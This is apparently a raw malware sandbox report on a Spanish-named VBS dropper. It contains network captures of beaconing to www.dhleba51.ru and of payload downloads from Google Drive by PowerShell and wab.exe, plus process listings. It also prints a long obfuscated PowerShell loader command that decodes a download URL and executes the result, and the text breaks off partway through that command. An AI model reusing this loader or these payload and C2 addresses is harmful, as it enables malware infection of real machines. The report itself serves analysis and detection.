                                        Apr 24, 2024 07:05:04.214073896 CEST | 643 | OUT | POST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 193
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Data Ascii: _Ny4=zxv1usXggHyH6YFGpAf8cp27WuWxOMtTK8v+mjl3dy6cl8ighHw8E+H+NdO4iElWBwovirtXLIGaVpNYSMxegnSrKiZYUuTXrnbF6gpvJGLQC/2ezYBDdfLd/JX48mccuA1kfeJBYKyTonMlCAlwLXHwJPOMq3lyRu+PF3gpB9RZT8RtJowKdKlxeVOe
                                        Apr 24, 2024 07:05:04.554496050 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:04 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.9 | 49717 | 195.24.68.5 | 80 | 5248 | C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Apr 24, 2024 07:05:07.080873013 CEST | 667 | OUT | POST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 217
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Data Ascii: _Ny4=zxv1usXggHyHg7dGujn8Xp2kK+WxEstXK9T+miwwIQeckZeggFI8D+H+C9O9tklnBwlPirRXLIiaVrVYT+ZRmnSpHCZabOTXrnbF6gM0JGDQDPGex8VMDPLS6JX44mcAuA1WfaBnYJKToiolFRl3QHHyX/OTqF0WQoeSNFgbBOx8d9xzYa5RIdlWZyH2pOVkiSosFp+5Uw2auaogow==
                                        Apr 24, 2024 07:05:07.428824902 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:07 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes
                                        Apr 24, 2024 07:05:07.429176092 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                        Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                        Apr 24, 2024 07:05:07.429220915 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                        Apr 24, 2024 07:05:07.429280043 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                        Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                        Apr 24, 2024 07:05:07.429328918 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                        Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                        Apr 24, 2024 07:05:07.429402113 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                        Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                        Apr 24, 2024 07:05:07.429485083 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                        Apr 24, 2024 07:05:07.429575920 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                        Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                        Apr 24, 2024 07:05:07.773720026 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                        Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port
                                        3           192.168.2.9  49718        195.24.68.5     80
                                        Timestamp  Bytes transferred  Direction  Data
                                        Apr 24, 2024 07:05:10.397248030 CEST  1680  OUT  POST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 1229
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Apr 24, 2024 07:05:10.746354103 CEST  1289  IN  HTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:10 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes


                                        Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                        0           192.168.2.9  49706        142.250.101.100  443               7500  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        2024-04-24 05:03:03 UTC  215  OUT  GET /uc?export=download&id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:03:04 UTC  1582  IN  HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 24 Apr 2024 05:03:04 GMT
                                        Location: https://drive.usercontent.google.com/download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: script-src 'nonce-xsu5KcnI8CFhGYtNXm4ACg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Cross-Origin-Opener-Policy: same-origin
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                        1           192.168.2.9  49707        142.251.2.132   443               7500  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Timestamp  Bytes transferred  Direction  Data
                                        2024-04-24 05:03:04 UTC  233  OUT  GET /download?id=13sIDgKu2D7iI6zRxA4gGYSas5i0mhATB&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:03:06 UTC  4746  IN  HTTP/1.1 200 OK
                                        X-GUploader-UploadID: ABPtcPq0DQiulHKwAkJlvp_f1VZ4ysFLddOLgTpTfsjLUoun8euZIwW5gvVVdVFIgCeHud4-6OM
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="Senatorian.cur"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 477016
                                        Last-Modified: Mon, 22 Apr 2024 15:58:30 GMT
                                        Date: Wed, 24 Apr 2024 05:03:05 GMT
                                        Expires: Wed, 24 Apr 2024 05:03:05 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=Iw/GxA==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.9 | 49712 | 142.250.101.100 | 443 | 6908 | C:\Program Files (x86)\Windows Mail\wab.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-04-24 05:03:58 UTC | 216 | OUT | GET /uc?export=download&id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Host: drive.google.com
                                        Cache-Control: no-cache
                                        2024-04-24 05:03:58 UTC | 1582 | IN | HTTP/1.1 303 See Other
                                        Content-Type: application/binary
                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                        Pragma: no-cache
                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                        Date: Wed, 24 Apr 2024 05:03:58 GMT
                                        Location: https://drive.usercontent.google.com/download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download
                                        Strict-Transport-Security: max-age=31536000
                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                        Content-Security-Policy: script-src 'nonce-DzRehfSY8kMwjD8YC83zQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                        Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factor, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                        Cross-Origin-Opener-Policy: same-origin
                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
                                        Server: ESF
                                        Content-Length: 0
                                        X-XSS-Protection: 0
                                        X-Frame-Options: SAMEORIGIN
                                        X-Content-Type-Options: nosniff
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.9 | 49713 | 142.251.2.132 | 443 | 6908 | C:\Program Files (x86)\Windows Mail\wab.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-04-24 05:03:59 UTC | 258 | OUT | GET /download?id=1-KQmxodyjhhw6fN77qkVCo3Tox2hzzLI&export=download HTTP/1.1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                        Cache-Control: no-cache
                                        Host: drive.usercontent.google.com
                                        Connection: Keep-Alive
                                        2024-04-24 05:04:00 UTC | 4762 | IN | HTTP/1.1 200 OK
                                        X-GUploader-UploadID: ABPtcPqedKmtX9MASgbaNRkumAgM_jhE9hb1JVTJ_ENQit_uDiJV4ilZV9iokaOy_6lmt-RSDLPdbqgV3g
                                        Content-Type: application/octet-stream
                                        Content-Security-Policy: sandbox
                                        Content-Security-Policy: default-src 'none'
                                        Content-Security-Policy: frame-ancestors 'none'
                                        X-Content-Security-Policy: sandbox
                                        Cross-Origin-Opener-Policy: same-origin
                                        Cross-Origin-Embedder-Policy: require-corp
                                        Cross-Origin-Resource-Policy: same-site
                                        X-Content-Type-Options: nosniff
                                        Content-Disposition: attachment; filename="mQacOddRSSTdtOOD119.bin"
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Credentials: false
                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, 
X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Desusertion, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt
                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                        Accept-Ranges: bytes
                                        Content-Length: 268864
                                        Last-Modified: Mon, 22 Apr 2024 15:55:58 GMT
                                        Date: Wed, 24 Apr 2024 05:03:59 GMT
                                        Expires: Wed, 24 Apr 2024 05:03:59 GMT
                                        Cache-Control: private, max-age=0
                                        X-Goog-Hash: crc32c=Hz0cwQ==
                                        Server: UploadServer
                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                        Connection: close


                                        Target ID:0
                                        Start time:07:02:58
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\wscript.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1000901 LIQUIDACION.vbs"
                                        Imagebase:0x7ff61f100000
                                        File size:170'496 bytes
                                        MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:2
                                        Start time:07:02:59
                                        Start date:24/04/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Demonland = 1;$Predecreeing='Substrin';$Predecreeing+='g';Function Herremaend($Sursdt){$monuronsnteranimate=$Sursdt.Length-$Demonland;For($monurons=5; $monurons -lt $monuronsnteranimate; $monurons+=(6)){$Alaskans+=$Sursdt.$Predecreeing.Invoke($monurons, $Demonland);}$Alaskans;}function Surere($Adipometer){. ($Disaffirmative) ($Adipometer);}$Monostichic=Herremaend 'AristMDe.imo SjakzSaks.ikortslSportlOmplaarelai/Hiero5Addit..plgk0T,aum An.ta(ProduWEqui.iGeniznIldebdPa.rao SnitwPickesAlleg ,ersoNI,fanTUdpos drown1Wighe0Abbes.Unser0Snoni;Pri o UtakWAfgifi efugnSkal,6Casto4Benin;R.stb FresxTurbu6Homog4 Radb;Round FurcrrVebogv Matr:Famil1 Aste2 Irre1Hvede. Fa,u0Un,er)Gummi unmutG U.dveT lesc ArabkAdvo,o A.ti/Retor2Bi,le0Taale1Folke0Overs0Mede 1Calch0Parti1H.and FlintFPardoiNondirNonvae EstufD,teno Hus.x Pers/Murbr1Filbe2 lapu1b.udo. Un.e0Straf ';$Apyonin182=Herremaend 'EksprUPapirs,ingeeSucrerSpeci-sk.ttASamvigRevaleAfkvinU armt.ofag ';$Halloffire=Herremaend 'Planoh FedetSponttKo,sip SidesNon,r:Speda/Efter/Friskd Kar,rFacadiQv.nsvSlidbeAl,at.BifalgDiloho Socio ,enogSp.cilUndereGlo i. ,nnac reto AfstmGrept/ PadauOv rgcForsk?dyrebeFascixLuftrp ,isco banfr F idtHuffi=Chattd inusoTelefw NattnAftallTranco.anelaArbejd Send&LeggiiUnbludRecla= Dunj1Filmg3 O sts PellIBlokpDEuropg isanKUn oluTrafi2RedskDBuega7Ol,giiP.icaIPosta6 AposzCa,riR ParkxC,mpoA ond4Macaag SoupGTr,jeYtingsS DecoaIniqusVoitu5Ar,aniAl.rm0,asufm Ulovh eriAAdoptTUdfreB icca ';$Startngles=Herremaend 'Redak>Paraf ';$Disaffirmative=Herremaend 'I ebli Vil,e.npatxAdelo ';$Forfrdiget='Tented';Surere (Herremaend ' UlovSsweepefeerstTandk-AttacCSpillodevionTryk.tSodeneProtenOpsentLaves Dunc - A.prPUnderaSubmytStal,hnondi ProtoTkun.t:H,lvt\ ebusTFircieHusassSpytstVesicuStrogdRecipoSugge. 
